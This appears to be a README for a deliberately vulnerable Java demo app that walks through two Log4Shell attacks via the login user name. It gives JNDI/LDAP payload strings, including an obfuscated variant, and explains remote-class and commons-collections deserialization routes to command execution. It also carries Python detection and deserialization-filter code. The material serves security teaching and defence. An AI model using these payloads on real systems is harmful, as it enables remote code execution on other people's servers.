Log4Shell exploits in TODOlist application

This application contains two exploits based on CVE-2021-44228 (Log4Shell). Both are triggered from the login page: when a login fails (wrong password or unknown user), the application logs the attempt, including the supplied user name, to the console with a vulnerable log4j version, so the user name goes through log4j's lookup processing.

Hack 1 for older Java builds (trustURLCodebase=true)

This targets the Java builds where com.sun.jndi.ldap.object.trustURLCodebase is true by default: all JDK builds older than 6u211, 7u201, 8u191 and 11.0.1. Newer builds can be attacked with this method as well when com.sun.jndi.ldap.object.trustURLCodebase=true is set manually.

Server

Start up the log4shell server

  • go to java-goof/log4shell-goof/log4shell-server
  • Start up the server
    • In the IDE (run /src/main/Server.java)
    • Or with Maven: mvn exec:java

Hack

After starting the todolist application, go to the login page and log in with:

  • Username: ${jndi:ldap://127.0.0.1:9999/Evil} (change the IP and port accordingly if not running on localhost)
  • Password: does not matter

This results in a file written to /tmp/pwned

Explanation

The server starts two components:

  • a JNDI (LDAP) server
  • an HTTP web server

log4j evaluates the ${jndi:...} lookup in the logged user name and connects to the LDAP server (controlled by the attacker). The LDAP server answers with a reference to the HTTP server (also controlled by the attacker), from which the target downloads the class file Evil.class. This class carries the remote code execution (it calls the runtime with an arbitrary command) in its getObjectInstance() method, which runs when the object is instantiated on the target machine. This only works when the JDK setting com.sun.jndi.ldap.object.trustURLCodebase=true, which is the default in older JDK builds.
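The lookup evaluation described above, as an added example that is not part of the java-goof project: a small Python model of how a vulnerable log4j 2.x resolves ${...} lookups in a logged message, covering the lower, upper and env lookups and the :-default syntax attackers use to hide the jndi: prefix. It reports the JNDI URL the vulnerable logger would contact for the Evil and Commons user names used on this page and can double as a detection check over login attempts or log lines. It is an assumption that only these lookup types matter for the check; real log4j supports many more, and the sample user names at the bottom are constructed here.

```python
import re

# Innermost ${...} lookup: no further "${" inside the braces.
INNERMOST = re.compile(r"\$\{([^{}]*)\}")
KEEP = "\x01"        # stands in for the "$" of a lookup log4j would leave unresolved
MAX_PASSES = 50      # guards against values that keep expanding into new lookups


def _resolve_one(body, env, targets):
    """Resolve the text between "${" and "}" of one innermost lookup."""
    default = None
    if ":-" in body:                      # ${key:-default}
        body, default = body.split(":-", 1)
    prefix, _, key = body.partition(":")
    if prefix == "jndi":                  # the dangerous lookup: record where it would connect
        targets.append(key)
        return "<jndi:%s>" % key
    if prefix == "lower":
        return key.lower()
    if prefix == "upper":
        return key.upper()
    if prefix == "env" and key in env:
        return env[key]
    if default is not None:               # unknown key or prefix, but a default was given
        return default
    # Unresolvable: log4j leaves the literal text; mark it so it is not re-scanned.
    return KEEP + "{" + body + "}"


def resolve_lookups(message, env=None):
    """Expand lookups the way a vulnerable log4j 2.x expands a logged message.

    Returns (expanded_text, jndi_targets): the text after lookup processing and the
    list of JNDI URLs that would have been contacted while logging it. Inner lookups
    are resolved first, so obfuscated prefixes collapse into a plain jndi: lookup."""
    env = {} if env is None else env
    targets = []
    text = message
    for _ in range(MAX_PASSES):
        expanded = INNERMOST.sub(lambda m: _resolve_one(m.group(1), env, targets), text)
        if expanded == text:
            break
        text = expanded
    return text.replace(KEEP, "$"), targets


def jndi_targets(line, env=None):
    """Detection check: the JNDI URLs a vulnerable logger would reach out to for `line`."""
    return resolve_lookups(line, env)[1]


if __name__ == "__main__":
    # Constructed sample login attempts: the two payloads from this page, an obfuscated
    # variant that hides the "jndi" prefix and the host, and a harmless user name.
    for user in ["${jndi:ldap://127.0.0.1:9999/Evil}",
                 "${jndi:ldap://127.0.0.1:9999/Commons}",
                 "${${lower:J}ndi:${::-l}dap://${env:NOPE:-127.0.0.1}:9999/Evil}",
                 "alice"]:
        print("%-70s -> %s" % (user, jndi_targets(user) or "clean"))
```

Running the module prints the resolved LDAP URL for the first three user names and "clean" for the last one; the obfuscated variant resolves to exactly the same URL as the plain Hack 1 payload, which is why a check that only greps for the literal string "${jndi:" is not enough.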

Hack 2 for all Java builds (including the newest)

Server

  • same as in Hack 1

Hack

After starting the todolist application, go to the login page and log in with:

  • Username: ${jndi:ldap://127.0.0.1:9999/Commons} (change the IP and port accordingly if not running on localhost)
  • Password: does not matter

This results in a file written to /tmp/pwned-commons

Note: when running the application in a Docker container with Tomcat, as described in the tomcat-rce hack, use the following instead:

  • Username: ${jndi:ldap://host.docker.internal:9999/Commons2} (change the IP and port accordingly if not running on localhost)
  • Password: does not matter

This inserts some text into the header file.

Explanation

For newer JDK builds, where com.sun.jndi.ldap.object.trustURLCodebase=false, the attack still works when the classes it needs are already on the classpath: we can get RCE through Java deserialization. The application uses the commons-collections 3.1 library, which contains a known deserialization gadget chain. Instead of a remote codebase reference, the LDAP server now returns a serialized object built from this gadget chain. Since the classes are already available on the target, deserializing that object executes a command, so setting trustURLCodebase=false alone does not mitigate Log4Shell.
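The serialized gadget described above, as an added example that is not the project's code: a Python scan of a Java serialization stream (the bytes the LDAP server would hand back in its javaSerializedData attribute) that lists the class descriptors it carries and applies a jdk.serialFilter-style pattern to them, the way a JVM ObjectInputFilter decides before each class is resolved. The sample streams are constructed here with dummy serialVersionUIDs and no fields; they have the shape of a serialized object wrapping a commons-collections map, not a working gadget chain. The class scan is a heuristic (it looks for TC_CLASSDESC markers followed by a valid class name rather than doing a full type-driven parse), and limit patterns such as maxdepth= and module-qualified patterns are not modeled.

```python
import re
import struct

MAGIC = b"\xac\xed\x00\x05"      # STREAM_MAGIC + STREAM_VERSION
TC_OBJECT = 0x73
TC_CLASSDESC = 0x72
TC_ENDBLOCKDATA = 0x78
TC_NULL = 0x70
CLASS_NAME = re.compile(rb"^[A-Za-z_$][\w$]*(\.[A-Za-z_$][\w$]*)*$")


def class_names(stream):
    """Heuristically list the class descriptors in a Java serialization stream:
    a TC_CLASSDESC byte followed by a u2 length and a syntactically valid class name.
    Array classes ("[B" etc.) are deliberately skipped."""
    if not stream.startswith(MAGIC):
        raise ValueError("not a Java serialization stream (bad magic)")
    names, i = [], len(MAGIC)
    while i + 3 <= len(stream):
        if stream[i] == TC_CLASSDESC:
            (length,) = struct.unpack_from(">H", stream, i + 1)
            name = stream[i + 3:i + 3 + length]
            if length and len(name) == length and CLASS_NAME.match(name):
                names.append(name.decode("ascii"))
                i += 3 + length
                continue
        i += 1
    return names


def compile_filter(pattern):
    """Build a decision function from a jdk.serialFilter-style pattern list such as
    "!org.apache.commons.collections.**;java.util.*;!*": the first matching element
    wins, "!" rejects, ".**" covers a package and all subpackages, ".*" one package,
    a trailing "*" a name prefix, and a class no element matches is allowed
    (UNDECIDED in the JDK)."""
    rules = []
    for element in filter(None, (e.strip() for e in pattern.split(";"))):
        allow = not element.startswith("!")
        element = element.lstrip("!")
        if element == "*":
            regex = ".*"
        elif element.endswith(".**"):
            regex = re.escape(element[:-3]) + r"\..+"
        elif element.endswith(".*"):
            regex = re.escape(element[:-2]) + r"\.[^.]+"
        elif element.endswith("*"):
            regex = re.escape(element[:-1]) + ".*"
        else:
            regex = re.escape(element)
        rules.append((re.compile("^" + regex + "$"), allow))

    def decide(name):
        for regex, allow in rules:
            if regex.match(name):
                return allow
        return True
    return decide


def check_stream(stream, pattern):
    """Return (accepted, all_class_names, rejected_class_names) for `stream` under `pattern`."""
    decide = compile_filter(pattern)
    names = class_names(stream)
    rejected = [n for n in names if not decide(n)]
    return not rejected, names, rejected


def _class_desc(name):
    """Constructed TC_CLASSDESC: dummy serialVersionUID, SC_SERIALIZABLE flag, no fields,
    no class annotation and no superclass (demo shape only, not a real descriptor)."""
    raw = name.encode("ascii")
    return (bytes([TC_CLASSDESC]) + struct.pack(">H", len(raw)) + raw
            + b"\x00" * 8 + b"\x02" + b"\x00\x00"
            + bytes([TC_ENDBLOCKDATA, TC_NULL]))


# Constructed samples: the shape of a commons-collections gadget (a JDK class wrapping a
# commons-collections map) and a harmless HashMap.
SAMPLE_GADGET = (MAGIC + bytes([TC_OBJECT])
                 + _class_desc("sun.reflect.annotation.AnnotationInvocationHandler")
                 + bytes([TC_OBJECT]) + _class_desc("org.apache.commons.collections.map.LazyMap"))
SAMPLE_BENIGN = MAGIC + bytes([TC_OBJECT]) + _class_desc("java.util.HashMap")

# Deny commons-collections outright, allow what the application legitimately needs, reject the rest.
FILTER = "!org.apache.commons.collections.**;java.util.*;sun.reflect.annotation.*;!*"

if __name__ == "__main__":
    for label, blob in [("gadget", SAMPLE_GADGET), ("benign", SAMPLE_BENIGN)]:
        accepted, names, rejected = check_stream(blob, FILTER)
        print(label, "accepted" if accepted else "REJECTED", names, rejected)
```

The point of the deny-by-default pattern is that the outermost class of the gadget is a JDK class; only the nested commons-collections class trips the filter, which is why a filter has to see every class in the stream and not just the first one.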